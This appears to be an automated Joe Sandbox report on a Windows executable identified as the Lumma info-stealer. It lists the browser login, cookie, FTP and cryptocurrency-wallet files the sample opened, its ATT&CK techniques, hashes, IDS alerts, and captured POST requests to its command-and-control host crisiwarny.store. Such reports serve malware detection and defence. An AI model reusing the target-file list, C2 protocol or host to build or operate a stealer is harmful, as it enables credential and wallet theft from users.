              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\file.exe; Directory queried: C:\Users\user\Documents
              Source: Yara match; File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 751 Security Software Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 34 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | file.exe | 42% | ReversingLabs | Win32.Infostealer.Tinba |
              | file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
              | file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|---|---|
              | crisiwarny.store | 172.67.170.64 | true | true | | unknown |
              | presticitpo.store | unknown | unknown | true | | unknown |
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://crisiwarny.store/apibmfile.exe, 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://crisiwarny.store/jfile.exe, 00000001.00000003.1348738975.0000000005313000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1349101168.0000000005313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://crisiwarny.store/file.exe, 00000001.00000002.1447480635.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312761325.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1433151385.0000000005301000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1449178158.0000000005302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://crisiwarny.store/apiqfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://crisiwarny.store/8file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://crisiwarny.store/sfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IP:172.67.170.64
                                                                      Domain:crisiwarny.store
                                                                      Country:United States
                                                                      ASN:13335
                                                                      ASN Name:CLOUDFLARENETUS
                                                                      Malicious:true
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1542964
                                                                      Start date and time:2024-10-27 01:21:09 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 8s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:14
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: file.exe
                                                                      Time:19:22:09
                                                                      Type:API Interceptor
                                                                      Description:9x Sleep call for process: file.exe modified
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.529685648898097
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:2'939'904 bytes
                                                                                        MD5:89eb026b1e8b37df60728d38b5ba98ba
                                                                                        SHA1:20bef1ee48878b4b83d805f4b7d4c0b9b493f7d2
                                                                                        SHA256:7e903a309497439f4842b480e73d0b8c71a01cc597d3127c8869f093465c2317
                                                                                        SHA512:7f196f2db71473355c28438ca8755b845dc448117961a37c122b6f8f40a68f3fc80d8d7ea19357f9377d890efd415e3b8cd4e933bcecba365d0b05be7f0602dc
                                                                                        SSDEEP:49152:zo6p4/Ke4dutmcR2g5y2qzG6KOPeQtaAoF:z0/Ke4dutmcR2g5PMKN
                                                                                        TLSH:51D56C92B9497ACFD44F3378942BCD81995D43FA472D08C3982D75BA7DA3CC21AB6C24
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.......................... 0.....!d-...@.................................T...h..
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x6ff000
                                                                                        Entrypoint Section:.taggant
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                        Instruction
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        mov cl, 80h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        xor byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add al, 00h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        and al, 00h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        or byte ptr [eax+00000000h], al
                                                                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x58000 | 0x27e00 | 002c936e373f06907ab8bc89d0e485e4 | False | 0.9981081014890282 | data | 7.981472592877069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| fiufktgl | 0x5b000 | 0x2a3000 | 0x2a2400 | a66d7f60de2efc400db3423005ea68e0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| thfjtvjw | 0x2fe000 | 0x1000 | 0x600 | c18ea49e5ab275b4b3856a8d2c201aa2 | False | 0.583984375 | data | 4.968199609038253 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2ff000 | 0x3000 | 0x2200 | 1a658584d966161e422a6ea5d60307d5 | False | 0.09892003676470588 | DOS executable (COM) | 1.086968237601105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-27T01:22:10.970316+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T01:22:10.970316+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T01:22:12.156140+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49701 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T01:22:12.156140+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49701 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T01:22:15.939960+0200 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49703 | 172.67.170.64 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Oct 27, 2024 01:22:19.956979990 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957014084 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957133055 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957168102 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957285881 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957329035 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957492113 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957531929 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957701921 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957736015 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957927942 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957964897 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957978010 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957984924 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.958120108 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958137035 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.958165884 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958322048 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958353043 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968116999 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.968302965 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968333960 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.968354940 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968379974 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968406916 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968447924 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.973318100 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360757113 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360852003 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360903978 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.361016989 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.361030102 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.413428068 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413482904 CEST44349749172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.413572073 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413877010 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413897038 CEST44349749172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:25.186126947 CEST49749443192.168.2.7172.67.170.64
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 01:22:09.379457951 CEST | 53204 | 53 | 192.168.2.7 | 1.1.1.1
Oct 27, 2024 01:22:09.388345003 CEST | 53 | 53204 | 1.1.1.1 | 192.168.2.7
Oct 27, 2024 01:22:09.399055004 CEST | 60372 | 53 | 192.168.2.7 | 1.1.1.1
Oct 27, 2024 01:22:09.411726952 CEST | 53 | 60372 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 01:22:09.379457951 CEST | 192.168.2.7 | 1.1.1.1 | 0xaf8d | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 01:22:09.399055004 CEST | 192.168.2.7 | 1.1.1.1 | 0x594c | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 01:22:09.388345003 CEST | 1.1.1.1 | 192.168.2.7 | 0xaf8d | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 01:22:09.411726952 CEST | 1.1.1.1 | 192.168.2.7 | 0x594c | No error (0) | crisiwarny.store | | 172.67.170.64 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 01:22:09.411726952 CEST | 1.1.1.1 | 192.168.2.7 | 0x594c | No error (0) | crisiwarny.store | | 104.21.95.91 | A (IP address) | IN (0x0001) | false
                                                                                        • crisiwarny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 23:22:10 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: crisiwarny.store
2024-10-26 23:22:10 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
2024-10-26 23:22:10 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=821q07oqcvisnk503mbp0132s0; expires=Wed, 19 Feb 2025 17:08:49 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53hyps05kZ4gh69CWooERwcc5H1mkC7ImtUzhgN1q%2FcHtfQ2dvlhyLB%2BK9mbs%2F%2F3rLqZkQ%2Fhv7n%2BwuHRz5y7DhuGNIE9QjXp6xcSZxKgvHfzmGODgnQq%2Fs0CRnJuoXj1%2F7r0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fd7ddd54677-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1860&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1510693&cwnd=247&unsent_bytes=0&cid=21220a767df43cad&ts=599&x=0"
2024-10-26 23:22:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-26 23:22:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 172.67.170.64 | 443 | 6636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 23:22:11 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 52
                                                                                        Host: crisiwarny.store
2024-10-26 23:22:11 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-26 23:22:12 UTC | 1007 | IN | HTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=g6h7vj7oe9bkqvcincp8idtcjg; expires=Wed, 19 Feb 2025 17:08:50 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
